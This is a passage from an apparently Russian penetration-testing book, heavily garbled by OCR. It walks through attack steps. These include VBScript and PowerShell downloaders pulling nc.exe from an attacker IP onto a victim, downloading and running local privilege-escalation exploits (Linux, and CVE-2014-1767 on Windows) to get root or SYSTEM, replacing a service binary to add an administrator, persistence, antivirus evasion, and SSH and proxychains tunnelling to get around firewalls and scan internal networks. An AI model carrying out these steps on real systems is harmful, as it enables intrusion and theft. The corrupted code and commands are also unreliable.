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"/" ) + 1 ) )>> сіомпіоасіег. ѵЬз 

С: ХІІзегзХТезТхесію ЕІзеІТ оЬ]Р50.Ро1сІегЕхі5І:5( Ье-р-Ь ( туРаТН, Іп5ТгКеѵ( туРаІіМ^ "\" 

) - 1 ) ) ТИеп>> сіомпіоасіег. ѵЬз 

С:\ 1 ) 5 ег 5 \ 1 :е 5 І;>есРіо БІгРіІе = туРаІіМ>> сіомпіоасіег. ѵЬз 
С:\ 1 ) 5 ег 5 \ 1 :е 5 І;>есРіо ЕпсІ ІР>> сіомпіоасіег. ѵЬз 

С:\ 1 ) 5 ег 5 \ 1 :е 5 І;>есРіо 5еТ оЬ]Рі1е = оЬ]'Р50.0репТех1:Рі1е( зТгРіІе, РогІлІгіТіп^., Тгие )>> 
сіомпіоасіег. ѵЬ 5 

С:\ 1 ) 5 ег 5 \ 1 :е 5 І;>есРіо 5еТ оЬ^НТТР = Сгеа1еОЬ]ес1:( "ЫіпН1;1:р.ІлІіпН-ЫірКериезІ;.5.1" )>> 
сіомпіоасіег. ѵЬ 5 

С:\ 1 ) 5 ег 5 \ 1 :е 5 І;>есРіо оЬ^НТТР.Ореп " 6 ЕТ", туІІКІ, РаІ 5 е>> сіомпіоасіег. ѵЬ 5 
С:ХІІзегБХТезТхесІіо оЬзНТТР.5епсі>> сіомпіоасіег. ѵЬз 

С:ХІІзегзХТезТхесію Рог і = 1 То І_епВ( оЬ^НТТР.КезропгеВосІу )>> сіомпіоасіег. ѵЬг 
С:\ІІ 5 ег 5 \Т:е 5 І:>есРіо оЬ]Рі1е.Іл/гіТе Сііг( АзсВ( МісІВ( оЬзНТТР.КезропзеВосІу., і, 1 ) ) 

)>> сіомпіоасіег. ѵЬз 

С:\ 1 ) 5 ег 5 \ 1 :е 5 І;>есРіо Мех1;>> сіомпіоасіег. ѵЬз 
С:\ІІ 5 ег 5 \ 1 :е 5 І:>есЬо оЬ]РИе.С 1 о 5 е( )>> сіомпіоасіег. ѵЬз 
С:\ІІ 5 ег 5 \Те 5 І:>ес:Ііо ЕпсІ 5иЬ>> сіомпіоасіег. ѵЬз 

С: ХІІзегзХТезТхгзсгірТ сіомпіоасіег. ѵЬ 5 ШТр://192.168.255.128/пс. ехе пс.ехе 

В случае, если система жертвы работает под управлением ОС ѴѴіікіоѵѵз 7, 2008 
или более новой версии, можно написать скрипт для Ро\ѵег8Ье11, что значительно 
упростит работу. 

С: ХІІзегзХТезТхесію $ІлІеЬС1іепТ = Меи-ОЬзесІ: 5 у 5 І:ет. МеТ:.ЫеЬСІіепІо сіомпіоасіег. рз2 
С:\ІІ 5 ег 5 \Т:е 5 І:>есЬо $ІлІеЬС1іеп1:.Вомп1оасіРі1е("Ш1:р://192.168.255.128/пс:.ехе С:\ 

ІІгегзХТезІДпс.ехе")>> сіомпіоасіег. р52 

ромегзНеІІ.ехе -ЕхесиТіопРоІісу Вуразз -N 01050 -МопІпГегасТіѵе -МоРго-РіІе -Рііе 
сіомпіоасіег. рз 2 
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ТРТР — простой протокол передачи файлов, не поддерживает шифрование и аутен¬ 
тификацию, работает при помощи 11 [ ) Р. Его преимущество в том, что он поддер¬ 
живается большим количеством устройств и может работать в неинтерактивном 
режиме. 

РТР — протокол передачи файлов, работает при помощи ТСР Предоставляет более 
широкий набор возможностей, однако работает только в интерактивном режиме, 
что не всегда удобно. 

Вы также можете загрузить файлы на целевой сервер, используя Ро\ѵег8Ье11, ѴВ 
или другие языки для написания скриптов. 

Всегда учитывайте то, что на целевой системе может быть установлен антивирус, 
и даже если вы все сделали правильно, именно он может стать причиной вашей 
неудачи. Используйте специальные методы обхода антивирусов. 




Превышение привилегий 


В большинстве систем существует контроль и разграничение уровня доступа 
к системным ресурсам, цель которого — запрет выполнения административных 
функций рядовыми пользователями. 

В то же время любой эксплойт нацелен на то, чтобы после эксплуатации какой-ли¬ 
бо уязвимости выполнять запланированные действия с максимально возможным 
уровнем привилегий. До этого момента мы рассматривали исключительно удален¬ 
ные, сетевые атаки. Мы использовали эксплойты для проникновения в систему, 
после чего выполняли желаемые действия от имени привилегированного пользо¬ 
вателя. В дальнейшем мы будем исходить из того, что у нас есть доступ к системе, 
но мы можем выполнять любые действия только от имени непривилегированного 
пользователя. 

В этом случае мы будем использовать локальные эксплойты для повышения наших 
прав. По сути, большинство эксплойтов, нацеленных на повышение привилегий, 
предназначено для локального использования. 


Локальное повышение прав в Ыпих 

Представим себе следующую ситуацию: вам каким-то образом удалось заполу¬ 
чить логин и пароль пользователя к компьютеру под управлением ІГЬипІи 16.04. 
Вы зашли в систему при помощи 55Н и обнаружили, что вам не хватает прав для 
совершения определенных действий. 

Зое@о-р-Рісе:~$ ісі 

иісІ=1001(зое) §ісІ=1001(зое) §гоир5=1001(]'ое) 

Зое@о-р-Рісе:~$ саТ /еГс/зНасІои 

саТ: /е1:с/5НасІом: Регтіззіоп сіепіесі 

Зое@о-р-Рісе:~$ 
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После сравнительно недолгого поиска можно найти на схрІоіі чІЬ.сопі эксплойт 
для повышения прав пользователя в данной системе. Далее, в нашем случае, все 
происходит тривиально — скачиваем, компилируем и запускаем. 

Зое@о-р-Рісе : і»і§еТ -0 /Гтр/1оса1_ехр.с НГГрз://мми. ехрІоіГ-сІЬ.сот/сіоипІоасІ/40049 
- -2016-12-01 00:19:59-- ІіГГрз ://мим. ехрІоіГ-сІЬ. сот/сІомпІоасІ/40049 
Ке$о1ѵіп§ мим. ехрІоіГ-сІЬ. сот ( мим. ехрІоіГ-сІЬ. сот) ... 192.124.249.8 
СоппесГіп§ Го ими. ехрІоіГ-сІЬ. сот (ими. ехрІоіГ-сІЬ. сот) 1192.124.249.81 :443... 
соппесГесІ. 

НИР гелиезГ зепГ, анаігіп§ гезропзе... 200 0К 
І_еп§ГЬ: 6326 (6.2К) [аррІісаГіоп/ГхГ] 

5аѵіп§ Го: ѴГтр/1оса1_ехр. с’ 

/Гтр/1оса1_ехр.с 100%[===================>] 6.18К --.-КВ/з іп 05 

2016-12-01 00:20:00 (53.2 МВ/5) - ѴГтр/1оса1_ехр. с’ заѵесі [6326/6326] 

]ое@оГГісе:~$ §сс /Гтр/ехрІоіГІ -т32 -02 -о сіесг 
]ое@оГГісе:~$ §сс /Гтр/ехр1оіГ2 -02 -о рмп 
]ое@оГГісе:~$ ./сіесг 

еГГіІГег Таг^еГ-ОГГзеГ ІІЬипГи 16.04 4.4.0-21-§епегіс ехріоіг Ьу ѵпік 
[!] ОесгетепГіп§ ГИе геГсоипГ. ТНіз тау Гаке а мНіІе... 

[!] ЫаіГ Гог ГМе "Ропе" тезза§е (еѵеп і-р уои'11 §еГ ГЬе рготрГ Ьаск). 

]ое@оГГісе:~$ 

[ + ] Ропе! Г\Іом гип ./рмп 
]ое@оГГісе:~$ ./рмп 
[+] Езса1аГіп§ ргіѵз... 
гооГ@о-РГісе:~# ісі 

иісІ=0(гооГ) §ісІ=0(гооГ) §гоирз=0(гооГ) 
гооГ@о-РГісе:~# 

Обратите внимание на то, что мы скачали один файл, а скомпилировали два. Объ¬ 
яснение этому следующее: эксплойт состоит из двух файлов, которые необходимо 
запустить последовательно, однако исходный код обоих сохранен в один файл. По¬ 
этому, прежде чем компилировать, мы разделили их — перенесли информацию из 
одного файла в два, а затем скомпилировали и запустили оба. Всегда внимательно 
читайте описание эксплойта перед его запуском. 


Локальное повышение прав в ѴѴіпсіоѵѵз 

В этом примере мы продемонстрируем возможность локального повышения при¬ 
вилегий на компьютере под управлением \Ѵіпс1о\ѵ5 7 х64. Уязвимость, которую мы 
будем использовать, имеет код СѴЕ-2014-1767, а для компиляции эксплойта нам 
потребуется Руі Іюп. 

Самую новую версию Руі іюп мы скачали с официального сайта руНюп.ог§, а экс¬ 
плойт взяли с уже известного схрІоіі -сІЬ.соіп. 

Теперь нам необходимо сделать из РуіЬоп-скрипта исполняемый файл для 
ѴѴіпсІоѵѵз; установим для этого руіпзіаіісг. 
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С: \ІІзегз\ГезГ>рір іпзГаІІ руіпзГаІІег 
Со11есГіп§ руіпзГаІІег 

Оомп1оасІіп§ РуІпзГа11ег-3.2.Гаг.§2 (2.8МВ) 

100% | ################################ | 2.8МВ ЗЗЭкВ/5 
КериігетепГ аігеасіу заГізГіесІ (изе --ир§гасіе Іо ир§гасІе): зеГирГооІз іп с:\руГРю 
п27\1іР>\зіГе-раска§ез (Ггот руіпзГаІІег) 

Со11есГіп§ реГіІе (Ггот руіпзГаІІег) 

0омп1оасІіп§ реГіІе-2016.3.28. Гаг. §г (58кВ) 

100% | ################################ | 61кВ 2.0МВ/3 
Со11есГіп§ руріміп32 (Ггот руіпзГаІІег) 

0омп1оасІіп§ руріміп32-219-ср27-попе-міп32 .мРіі (6.7МВ) 

100% | ################################ | 6.7МВ 153кВ/з 
Со11есГіп§ ГиГиге (Ггот реГі1е->руіпзГа11ег) 

0омп1оасІіп§ ГиГиге-0.16.0. Гаг. (824кВ) 

100% | ################################ | 829кВ 758кВ/5 
ІпзГа11іп§ соІІесГесІ раска§ез: ГиГиге, реГПе, руріміп32, руіпзГаІІег 
Киппіп§ зеГир.ру ІпзГаІІ Гог ГиГиге ... сіопе 
Киппіп§ 5еГир.ру ІпзГаІІ Гог реГіІе ... сіопе 
Киппіп§ 5еГир.ру ІпзГаІІ Гог руіпзГаІІег ... сіопе 
ЗиссеззГиІІу іпзГаІІесі ГиГиге-0.16.0 реГіІе-2016.3.28 руіпзГаІІег-3.2 руріміп32- 
219 

После того как все необходимые инструменты установлены и эксплойт скачан, 
создадим исполняемый файл. 

С: \ІІ5егз\ГезГ>руіп5Га11ег --опеГПе С: \ІІзег5\ГезГ\0оип1оасІ5\39525. ру 
629 ІЫРО : РуіпзГаІІег : 3.2 
629 ІЫРО: РуГРюп: 2.7.12 

21824 ІІМРО: ВооГІоасІег с: \руГРіоп27\1іР>\5іГе-раска§ез\РуІп5Га11ег\ЬооГ1оасіег\ІлІіпсі 

оиз-32Р>іГ\гип. ехе 

21824 ІІМРО: сРіескіп§ ЕХЕ 

21827 ІІМРО: Виі1сІіп§ ЕХЕ Ьесаизе оиГ00-ЕХЕ.Гос із поп ехізГепГ 

21828 ІІМРО: Виі1сІіп§ ЕХЕ Ггот оиГ00-ЕХЕ.Гос 

21831 ІІМРО: АррепсІіп§ агсРііѵе Го ЕХЕ С:\ІІ5ег5\ГезГ\сІІ5Г\39525.ехе 
С: \ІІ5ег5\ГезГ> 

Теперь скопируем файл на машину жертвы и запустим его. 

С:\ІІ5ег5\зое> 39525.ехе 

[*] ЕхрІоіГ Гог М514-040 / СѴЕ-2014-1767 <АР0.5уз ЭоиЫе Ргее> 

[*] ТРіе сиггепГ ргосез5 із паГіѵе х86-64 

[*] АПосаГесі а 32-ЫГ ГгіепсІІу асісігезз Гог ГРіе зріеіісосіе аГ 0x0000000000010000 

[*] РоипсІ пГ!НаЮізраГсРіТаЬІе (ЭРРРРР802ВЕЕА6600 

[*] РоипсІ КОР §асІ§еГ Го сіізаЬІе 5МЕР @РРРРР802ВЕР81510 

[*] СгеаГесІ апсі соппесГес! а 50скеГ 

[*] Рі11іп§ ГРіе кегпеі Ріеар... 

[*] СгеаГесІ 7 гесГап§и1аг ге§іопз ° 

[*] Орепіп§ а Гііе Ріапсііе 

[ *] СгеаГіп§ МГИогкегРасГогу... 

[*] Тгі@§егіп@ зріеіісосіе ѵіа МГ()иегу1пГегѵа1РгоРі1е 
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[*] Со §о §асІ§е1; 5Ѵ5ТЕМ бГіѳіі! 

Місгобо-ЕТ Ыіпсіомб [ііѳгбіоп 6.3.9600] (с) 2013 Місгобо-ЕТ СогрогаТіоп. АН 
гезегѵесі. 

С: \ІлІІШ0ІдІ5\5у5І:ет32>мІ'юаті 
пТ аиТИогНуХБуБТет 

С: \ІлІІШ0ІлІ5\5у5І:ет32> 


Повышение привилегий в случае некорректной 
конфигурации прав доступа 

Представим себе следующий случай: есть некая программа, запущенная как систем¬ 
ный сервис, однако ни разработчик, ни администратор не удосужились проверить 
права доступа к файлам, используемым для работы этого сервиса. В таком случае 
получается, что любой пользователь может изменять используемые сервисом 
файлы. А это значит, что пользователь может внедрить в файл произвольный код 
и вызвать перезагрузку сервера, а после перезагрузки код будет выполнен с повы¬ 
шенными правами. 

В \Ѵшс1о\ѵз поиск файлов, к которым есть доступ у всех пользователей, легко осу¬ 
ществить при помощи Ро\ѵег5Ье11. 

Р5 С: \ІІ5ег5\зое> СеТ-СІііІгіІІіет С:\ -Кесигзе | СеТ-АсІ | ПпйбТг Еѵегуопе 
;ІНі_5егѵісе. ехе ВІІІ ЕТІМ\Агітіпі5І:га1:ог5 

Еѵегуопе АІІом РиІІСопТгоІ... 

пизЬЗтоп. ехе ВІІІЕТІМ\АсІтіпі5І:га1:ог5 

Еѵегуопе АІІом РиІІСопТгоІ... 

Теперь создаем исполняемый файл, отвечающий за то, чтобы пользователь ]ое был 
добавлен в группу Асітіпізѣгаіогз. 

гооТ@ка1і:~# $исіо арГ-^еТ іпБІаІІ тіп§м-и64 
Кеасііп§ раскате іібіб... Эопе 
Виіісііпё гіерепгіепсу Тгее 
Кеасііп§ 5І;а1;е іп-РогтаТіоп... Эопе 

ТНе Го11оміп§ асШТіопаІ раска§е5 мііі Ье іпзТаІІесІ: 

Ьіпи1:іІ5-тіп§м-м64-і686 Ьіпи1:іІ5-тіп§м-м64-х86-64 §++-тіп§м-м64 

ЗеШпё ир §па1:-тіп§м-и64 (6.1.1-12+19.1) ... 

ЗеШпё ир тіп§м-м64 (4.0.6-1) ... 

гоо1@ка1і:~# х86_64-м64-тіп§м32-§сс -о пизЬЗтоп.ехе /гооГ/иБегасісі.с 

Скопируем полученный файл на машину жертвы и заменим им оригинальный 
файл, после этого остается только перезагрузить сервис или машину жертвы. 
В случае, если у вас недостаточно прав, можно дождаться момента, пока это сделает 
кто-нибудь другой. 
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Резюме 

После получения доступа к консоли или графической системе сервера или рабочей 
станции чаще всего вы сможете выполнять действия только от имени пользователя, 
не имеющего больших привилегий. 

Находите уязвимости в операционных системах или конкретном ПО. В этом вам 
помогут сканеры безопасности и открытые базы данных уязвимостей, например 
схрІой-сІЬ.сопі. 

После того как вы нашли уязвимое место, используйте эксплойты для повышения 
своих привилегий. 

Помните, что повышение привилегий — это разовое мероприятие. Не забудьте 
закрепиться в системе, например, создав для себя пользователя с правами адми¬ 
нистратора, ведь не факт, что когда вы подключитесь к этому компьютеру еще раз, 
эта уязвимость еще будет существовать. 




Перенаправление портов 
и туннелирование 


Туннелирование — это процесс, в ходе которого создается логическое соединение 
между конечными точками сети. Его суть заключается в том, что происходит инкап¬ 
суляция пакетов одного типа трафика в пакеты другого типа. При этом инкапсули¬ 
руемые данные должны находиться на том же или более низком уровне модели 051. 

Перенаправление портов — это метод перенаправления данных с определенного 
порта локального компьютера на удаленный и наоборот. Используется в защищен¬ 
ных брандмауэром сетях. 

В этой главе мы рассмотрим некоторые варианты перенаправления и туннели¬ 
рования и приведем практические примеры их использования. Начнем с самого 
простого — перенаправления портов. 

Перенаправление портов 

Перенаправление портов — самый простой способ управления трафиком. Его 
суть заключается в том, что мы принимаем сетевые данные на машине с одним ІР- 
адресом и портом, а затем перенаправляем на другой ІР-адрес и порт. В йших есть 
замечательная утилита, которая поможет сделать это просто и быстро. 

Установим гіпеМ и добавим в ее конфигурационный файл ІР-адрес и порт под¬ 
ключения, а также ІР-адрес и порт перенаправления трафика. 

гоо-ЦЭкаІі :~# арТ-§е1: іпзіаіі гіпеТсІ 
Кеасііп§ раскате 1І5І5... Эопе 
Виі1сііп§ гіерепсіепсу Тгее 
Кеасііп§ зТаТе іп-РогтаТіоп... Эопе 
ТНе -Ро11оміп§ МЕЫ раска§е5 мііі Ье іпзТаІІесі: 
гіпеѣсі 

гоо-ЦЗкаІі:-# есііо "129.186.225.128 21 91.189.94.40 443" >> /еТс/гіпеІсІ.сопГ 
гоо1@ка1і:~# гузІетсП зТагТ гіпеісі 

В нашем случае клиентский компьютер может соединяться за пределами периметра 
только с сервисами, работающими на порте 21, как показано на рис. 14.1. Однако 
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после наших действий, обратившись к компьютеру Б, он будет перенаправлен на 
сервер В к сервису, работающему на порте 443. 




Рис. 14.1. Поток данных без перенаправления 



Рис. 14.2. Поток данных после перенаправления 


55Н-туннелирование 

У 55Н есть множество достоинств и преимуществ, но в этом разделе мы рассмо¬ 
трим только возможность создания на его основе защищенных туннелей. Схема 
сети в данном примере будет точно такой же, как и в предыдущем случае. Только 
теперь для выполнения той же задачи мы будем использовать 55Н. 

Г 00 Т@ 0 -рГісе:~# 55І1 129.186.225.128 -р 21 -I. 8080:91.198.94.40:443 

В нашем примере мы сначала указали локальный адрес и порт, а затем адрес и порт 
удаленного сервиса. 
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ш 

||| 



45.56.78.1:21 


129.186.225.128:21 


55М 129.186.225.128 -р 21 -І_ 8080:91.189.40:443 
МІрз://ІосаІ1іо5І:8080 


атакующий компьютер 


Рис. 14.3. Локальное перенаправление портов с использованием 55Н 

После создания 55Н-туннеля мы можем соединяться с удаленным сервером, 
несмотря на запрет брандмауэра атакованной организации. А учитывая то, что 
туннель построен с использованием 55Н, администратор не сможет просмотреть 
содержимое пакетов, поскольку все данные будут зашифрованы. 

Как мы уже упоминали выше, 8811 обладает достаточно большими возможностями 
и, помимо локального, поддерживает также удаленное перенаправление портов. 

Представьте, что вам удалось получить доступ к удаленному компьютеру, получить 
хеши паролей, а по ним узнать и сами пароли. Также на данном компьютере запу¬ 
щен Ѵ\'С-сервис, использующий стандартный порт 5500. Вы сделали обратный 
туннель от взломанного компьютера к своему и перенаправили через него порт на 
свой компьютер, пусть это будет порт 55555. Теперь вы можете соединиться со сво¬ 
им локальным интерфейсом через порт 55555 и попасть на удаленный компьютер 
через 55Н-туннель. 

Г 0 <л@ 0 -Р-Рісе:~# 55М 129.186.225.128 -К 55555:192.168.225.128:5500 


Атаков; 



129.186.225.128:21 


ззИ 129.186.225.128 -р 21 -Р 55555:127.0.0.1:5500 
НИрз://ІосаІМозІ:8080 


ѵпсѵіеѵѵег ІосаІМозІ::55555 


атакующий компьютер 


Рис. 14.4. Удаленное перенаправление портов с использованием 55Н 
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А теперь нам предстоит самая интересная часть — динамическое перенаправление 
портов, позволяющее создать на локальном компьютере своего рода прокси-сервер, 
через который может осуществляться туннелирование трафика. 

Вводные данные немного изменятся — представьте, что вам удалось взломать сер¬ 
вер, находящийся в [ )і\1/-сети и имеющий доступ в публичную сеть через порт 80. 
Теперь создадим на своем компьютере 80СК8 4 прокси, работающий с использо¬ 
ванием порта 8080 и перенаправляющий трафик через 55Н-туннель к любому из 
серверов в [)М/-сети. 



Рис. 14.5. Динамическое перенаправление портов с использованием 55Н 


ргохусИаіпз 

Это бесплатная утилита, позволяющая любой программе, работа которой основана 
на ТСР, пересылать свои данные через цепочку прокси-серверов, таких как ТОЕ, 
50СК5 4, 50СК5 5 или НТТР5. 

Она может пригодиться для тех случаев, когда вы захотите перенаправить свой 
трафик через несколько промежуточных узлов — например, так, как показано на 
рис. 14.6. 



Рис. 14.6. Пример цепочки прокси-серверов 
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С помощью данной программы вы сможете обойти ограничения, накладываемые 
брандмауэром организации, и сохранить свою анонимность в сети. Также она может 
быть полезна в случае, когда вы получили контроль над одной из машин внутри 
атакованной сети и не желаете повышать риск вашего обнаружения, устанавливая 
на нее дополнительное ПО. Используя ргохусЬаіш, вы сможете перенаправить 
через атакованный сервер какой угодно трафик со своей машины на любой ком¬ 
пьютер в атакованной сети. 

Приведем пример конфигурации каждого узла, задействованного в данной атаке. 
Для начала создадим 55Н между взломанным сервером и своим компьютером. 

гооТ@о-р-рісе:~# 55М -Т -М -К 55555:127.0.0.1:22 Г00І@129 .186.225.128 

Теперь сконфигурируем динамическое перенаправление портов на своем компью¬ 
тере таким образом, чтобы любое соединение с портом 8080 было перенаправлено 
на скомпрометированный сервер через туннель. 

Г00Т@ка1і:~# 55^ -Т -М -Э 127.0.0.1:8080 -р 55555 ]'ое@127.0.0.1 

Затем, используя ргохусЬаіпз, просканируем через созданный туннель внутреннюю 
сеть атакованной организации. 

гоо1:@ка1і :~# ргохусМаіпз птар птар -р 1-65535 -5Ѵ -55 -Т4 10.0.10.0/24 


Резюме 

Не пренебрегайте перенаправлением и туннелированнием — эти два приема по¬ 
могут вам развивать дальнейшее нападение на внутреннюю сеть через одну-един- 
ственную точку входа. 

Перенаправление портов поможет обойти запреты фаервола, а благодаря 55Н- 
туннелированию вы сможете зашифровать данные и тем самым скроете содержание 
трафика от посторонних глаз и внутренних систем защиты. 

Помните о ргохусЬаіпз: цепочки серверов можно создавать не только для того, 
чтобы скрыть свое присутствие, но и чтобы более комфортно себя чувствовать во 
внутренней сети атакованной организации! 



Переполнение буфера 


Атаки, направленные на переполнение буфера 

Со времен знаменитой атаки червя Морриса в 1988 году возможность перепол¬ 
нения буфера (1)4 Пег оѵегйо\ѵ) является основной причиной многих уязвимостей 
в программах и операционных системах. Зачастую теория переполнения буфера 
описывается достаточно сложно, с использованием специфической терминологии 
и приемов, непонятных многим специалистам, не задействованным в процессе 
разработки ПО. 

В этой главе мы попытаемся сохранить баланс между простотой изложения и глу¬ 
биной погружения в данный вопрос. 


Введение 

Информацию об эксплойтах, использующих уязвимость типа «переполнение буфе¬ 
ра», в наши дни можно найти во всех новостных рассылках и на любых веб-сайтах, 
освещающих тему информационной безопасности. Так что же это такое? 

Например, раздел 8АКЗ, посвященный направленным на переполнение буфера 
атакам, начинается со следующих слов: 

Переполнение буфера может быть использовано для выполнения стороннего 
кода на компьютере жертвы, а поэтому оно должно относиться к уязви¬ 
мостям с ВЫСОКИМ риском. Каждый месяц обнаруживается достаточно 
большое количество уязвимостей, связанных с переполнением буфера. 

А вот как относится к этой проблеме СЕЕТ: 

Несмотря на известные риски, которые были открыты уже достаточно 
давно, переполнение буфера на сегодняшний день остается основной при¬ 


чиной взломов. 
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Хотя многие специалисты наслышаны о переполнении буфера, а также о том, что 
данная тема остается очень популярной и освещаемой, тем не менее в ней не так- 
то просто разобраться. Для понимания множества примеров и описаний, которые 
можно найти в глобальной сети, требуются хорошие навыки программирования на 
языке С, знание АззешЫег и опыт использования отладчиков. С другой стороны, 
некоторые статьи описывают методику переполнения буфера, фокусируясь лишь 
на теоретическом, абстрактном уровне. 

В данной главе мы рассмотрим несколько основных приемов переполнения бу¬ 
фера, стараясь, как уже было сказано выше, соблюсти баланс между простотой 
изложения и глубиной погружения. Придерживаясь данного подхода, мы будем 
описывать некоторые технические детали достаточно поверхностно, предлагая 
вниманию читателя упрощенную модель. 

Во время описания технологий мы возьмем за основу язык программирования С, 
ОС Ілпих и архитектуру х86, широко применяемую в процессорах семейства ІтііеІ 
и АМБ. 

На самом деле все другие архитектуры и ОС также подвержены атакам, направ¬ 
ленным на переполнение буфера, но имеют свои особенности. 

Что такое переполнение буфера? 

Основная цель любой программы, запущенной на компьютере, — обработка ка¬ 
ких-либо данных. Многие программы работают не со стандартным, изначально 
заданным набором данных, а с предоставляемой пользователем информацией. 
Программе необходимо хранить обрабатываемые данные в памяти компьютера, 
и именно с этого момента начинаются все проблемы! Многие программисты счи¬ 
тают, что пользователь будет вводить именно ту информацию, которую ожидает 
программа, и никакую другую. Это предположение относится к типу данных и к 
их размеру, — в качестве примера можно привести строковые данные. Например, 
считается, что адрес веб-страницы не может быть длиннее 500 символов, поэтому 
для данного типа данных выделяют от 50 до 250 символов. Но некоторые програм¬ 
мисты резервируют для такой информации область размером до 5000 символов. 
Этот объем зарезервированной памяти и называют буфером. 

Пока что все выглядит достаточно хорошо. Теперь мы переходим к более инте¬ 
ресной части — будет ли проверяться величина введенной пользователем ин¬ 
формации? Доверимся ли мы безоговорочно пользователю и будем считать, что 
он никогда не введет больше 5000 символов, или наша программа все же будет 
проверять введенную строку на случай выхода за рамки выделенной памяти, если 
кто-то попытается ввести больше 5000 символов? 

Во многих случаях эта проверка не выполняется. Это может быть связано с не¬ 
достатком квалификации программиста, его ленью или другими факторами — 
программа просто работает с теми данными, которые предоставил пользователь. 
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Так что же произойдет, если кто-нибудь введет 5400 символов? Первые, ожида¬ 
емые, 5000 символов будут помещены в заранее выделенную область памяти, 
а остальные 400 символов будут помещены в область памяти, находящуюся за 
рамками зарезервированного буфера, что, собственно, и является примером его 
переполнения. 

Необходимо учитывать, что любой ввод информации пользователем должен со¬ 
ответствующе проверяться, иначе он может быть причиной переполнения буфера. 
Это включает в себя: 

1) данные, вводимые в текстовые поля; 

2) данные, получаемые программой сетевые данные; 

3) данные из файлов; 

4) данные, передающиеся как параметр из командной строки; 

5) данные, получаемые от глобальных переменных (%ТМР% в ѴѴіпсІоѵѵз $ТМР 
в Ілпих); 

6) и многие другие... 

Примеры 1, 2 и 3 могут привести к удаленному переполнению буфера, тогда как 
остальные выполняются локально. 

В зависимости от различных факторов — выбранного программистом метода резер¬ 
вирования памяти, а также типа внутренней организации памяти компьютера, — 
переполнение буфера может привести к следующим последствиям. 

1. Искажение данных программы, которое может привести к неправильному ре¬ 
зультату ее работы. Например, при работе веб-сервера, в случае удачной атаки, 
пользователь получит не запрашиваемые данные, а ошибку 404. 

2. Повреждение сегментов, контролирующих исполнение программы, может 
привести к ее некорректному завершению с ошибкой «ассезз зе§тепІ ѵіоіайоп» 
в Гіініх или «§епега1 ргоіесхіоп іаиіі» в ѴѴіікІоѵѵз. Появление таких ошибок ука¬ 
зывает на то, что программа пытается получить доступ к данным, находящимся 
за пределами выделенной для нее области памяти. 

3. Некорректное завершение работы ОС в случае, если были вовлечены структуры, 
контролирующие ее работу. 

Конечно, это не самый лучший вариант работы ПО в случае возникновения не¬ 
предвиденной ситуации, однако это намного лучше таких случаев, когда 

4. Переполнение буфера дает возможность атакующему выполнить свой код на 
машине жертвы. 

Вот почему переполнение буфера представляет собой настолько большую угрозу! 

Для того чтобы понять, как происходит атака в последнем случае, далее мы рас¬ 
смотрим некоторые основы устройства памяти и программ. 
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Программы, библиотеки и бинарные файлы 

Любая написанная в наши дни программа использует для обработки данных 
различные переменные, константы и набор всевозможных инструкций. Обычно 
инструкции сгруппированы в так называемые модули — или функции, если брать 
язык С. К счастью, многие рутинные задачи не приходится программировать от¬ 
дельно, они уже доступны в виде функций в подключаемых библиотеках. Данные 
библиотеки, используемые для выполнения рутинных задач, могут быть получены 
от ОС или из других источников. 

Для преобразования в машинный код инструкций, написанных, например, на 
языке С, используется специальная программа — компилятор. На выходе он вы¬ 
дает файл, содержащий инструкции, состоящие из последовательности битов, 
выполняемые процессором для реализации заложенной программистом задачи. 
При помощи отладчика можно конвертировать машинный код в код, понятный 
человеку, представленный с помощью языка АззешЫег. Другая программа, на¬ 
зываемая линкером (Ііпкег) и во многих случаях уже включенная в компилятор, 
используется для интегрирования всех частей программы, например сторонних 
библиотек и функций, в единое целое. Файл, который получается в результате 
работы программиста, компилятора и линкера, называется бинарным. 

Когда пользователь запускает программу, ее исполнение начинается с первой 
строки, что является эквивалентом первой строки написанной на языке С про¬ 
граммы, а именно функции таіп(). В нетривиально написанных программах 
функция таіп() может вызывать другую функцию, которая в свою очередь может 
вызвать третью и т. д. Завершение программы происходит по вызову функцией 
шаіп() функции ехй() или тогда, когда пользователь сам прекратит ее выпол¬ 
нение. 

Угрозы 

Бинарный файл исполняется в определенном контексте, который определяет 
уровень привилегий процесса или запускающего данную программу пользова¬ 
теля. Тип и описание привилегий зависят от ОС и конфигурации компьютера. 
Самый простой пример привилегий — это право читать и вносить исправления 
в содержимое файла, создавать сетевые соединения на отдельных портах, а так¬ 
же завершать работу программы или всего компьютера. Обычно контекст вы¬ 
полнения программы напрямую зависит от прав пользователя. Это значит, что 
программа будет иметь возможность выполнить только те действия, которые 
пользователь мог бы выполнить и сам, вручную. И это не зависит от заложенных 
программистом инструкций. 

Некоторым программам необходимо для выполнения своих задач больше приви¬ 
легий. Например, программа, позволяющая пользователю изменять свой пароль. 
Такой программе необходимо иметь возможность исправлять содержимое фай¬ 
ла ОС, содержащего информацию о пользователях. В ІІпіх-подобных системах для 
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выполнения таких задач предусмотрен зиісі, что позволяет программе выполняться 
с заданным набором привилегий, который может отличаться от привилегий вы¬ 
звавшего эту программу пользователя. 

Такие файлы являются хорошей целью для атакующего. Также на компьютерах есть 
программы с расширенными привилегиями, запускающиеся в момент запуска ОС. 
В \Ѵіпс1о\ѵ5 это сервисы, а в I і п і х — так называемые демоны. Наличие расширенных 
привилегий и доступность (стандартные демоны и сервисы всегда присутствуют на 
компьютере жертвы и всегда запущены) делают их основной и наилучшей целью 
для атакующего. 

Итак, основной целью атакующего является использование возможности пере¬ 
полнения буфера программы, обладающей повышенными привилегиями, для вы¬ 
полнения своего кода на машине жертвы. 


Основы компьютерной архитектуры 

Исходя из классической модели фон Неймана, компьютер состоит из: 

□ арифметико-логического устройства (АЛУ), занимающегося обработкой дан¬ 
ных; 

□ памяти, каждая ячейка которой пронумерована, а нумерация начинается с О 
(ее можно разделить на энергозависимую оперативную память и энергонеза¬ 
висимую — жесткий диск); 

□ устройства управления; 

□ устройства ввода и вывода (клавиатура, сетевой интерфейс, принтер и т. д.). 

АЛУ {англ. СРИ) обычно называют процессором, оно содержит набор регистров, 
предназначенных для манипуляции с данными и их обработки. Каждый регистр 
имеет указатель инструкции (іпзігисііоп роіпіег, ІР), необходимый для отсле¬ 
живания выполнения программой инструкций и содержащий адрес следующей 
инструкции, которую необходимо выполнить. Указатель — в основном запись, 
содержащая адрес сегмента памяти. 

Наименьшее количество информации, которое компьютер может обработать, на¬ 
зывается битом. Но работа с битами не является эффективной. Для оптимизации 
работы компьютера был разработан тип данных, называемый словом (\ѵогсі). В на¬ 
стоящее время слово имеет размер в 32 бита, а процессор, умеющий работать со 
словом размером в 64 бита, был изобретен еще в далеком 1993 году. 

Организация памяти 

